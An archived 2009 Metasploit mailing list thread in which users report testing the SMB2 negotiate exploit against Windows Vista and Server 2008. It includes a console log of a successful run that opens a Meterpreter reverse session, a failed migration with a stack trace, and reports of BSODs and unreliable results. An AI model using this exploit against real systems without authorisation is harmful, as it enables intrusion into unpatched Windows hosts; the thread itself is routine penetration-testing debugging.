Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Metasploit 3.3 Development Updates

From: mtgarden at gmail.com (Matt Gardenghi)
Date: Tue, 29 Sep 2009 12:16:13 -0400
Is this caused by DEP?  That might explain the successful exploit but
failure to migrate....

On Tue, Sep 29, 2009 at 12:08 PM, David Gomes <skysbsb at gmail.com> wrote:


I have tried against Windows Vista and sucessful exploit the vulnerability.
However, i can't migrate to another process, and i can't exploit this same
vulnerability twice.

msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (10.10.0.38:445)...
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (10.10.0.55:4444 -> 10.10.0.38:64969)

meterpreter > ps

Process list
============
    3952  Explorer.EXE                 C:\Windows\Explorer.EXE
...

meterpreter > migrate 3952
[*] Migrating to 3952...


^C[-] Error while running command migrate:
meterpreter > ps
[-] Error running command ps: undefined method `write' for nil:NilClass
/pentest/exploits/framework3/lib/rex/socket/ssl_tcp.rb:97:in
`write'/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:59:in
`send_packet'/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:92:in
`send_packet_wait_response'/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:69:in
`send_request'/pentest/exploits/framework3/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:216:in
`get_processes'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:190:in
`cmd_ps'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in
`run_command'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in
`interact'/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in
`call'/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in
`run'/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in
`interact'/pentest/exploits/framework3/lib/msf/base/sessions/meterpreter.rb:203:in
`_interact'/pentest/exploits/framework3/lib/rex/ui/interactive.rb:48:in
`interact'/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/core.rb:1007:in
`cmd_sessions'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in
`cmd_exploit'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:127:in
`run'./msfconsole:82
meterpreter > exit

msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (10.10.0.38:445)...
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...

[*] Exploit completed, but no session was created.





On Tue, Sep 29, 2009 at 11:02 AM, Danilo Nascimento <
danilo.nascimento.c at gmail.com> wrote:


I can't exploit VMs in VirtualBox against Windows Server 2008
Enterprise/Standart (no updates) and Windows Vista Business en SP1 in
a x86 Host and Guest SO. I've tried enable/disable the PAE/NX option
but a BSOD ocurred when i run the exploit.

Which VM Application are you using? When i have some free time i'll
test in Vmware ESXi and XEN.

This exploit works fine against physical machines (Vista SP1 and
Windows Server 2008) for me, the problem is that i can't migrate to
another process (Explorer.exe) and i can exploit only once.

Danilo Nascimento



On Tue, Sep 29, 2009 at 9:01 AM, HD Moore <hdm at metasploit.com> wrote:

On Tue, 2009-09-29 at 12:42 +0200, Giorgio Casali wrote:


Unfortunately I tried it against a Vista Sp2 Enterprise and exploit
failed while on a Vista SP2 Ultimate I ended up with a BSOD.
Any idea where I should look into?


Were seeing reports of it failing about 50/50 with physical machines and
working almost always with VMs - either way we need to dig into it and
do a little more work. Thanks for the feedback!

-HD

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework





--
David Gomes Guimar?es,
Graduando em Ci?ncia da Computa??o - UFG,
Estagi?rio da ?rea de redes - CERCOMP/UFG.

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework





-- 
Matt Gardenghi
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090929/f58be460/attachment.html>
Previous By Date Next
Previous By Thread Next

Current thread: